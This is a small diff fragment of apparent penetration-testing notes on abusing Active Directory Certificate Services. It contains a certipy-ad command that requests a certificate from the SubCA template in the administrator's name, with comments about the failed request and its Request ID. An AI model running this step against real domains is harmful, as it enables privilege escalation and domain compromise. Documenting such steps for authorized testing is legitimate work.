Usage Tips:

 Sample Output:

-2. Request a Cert Based on SubCA
+TO-DO3.
+Request a Cert Based on SubCA

-# Take note of the Request ID
+# Expect to be failed.
+Take note of the Request ID

 certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -template SubCA -upn administrator@<DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'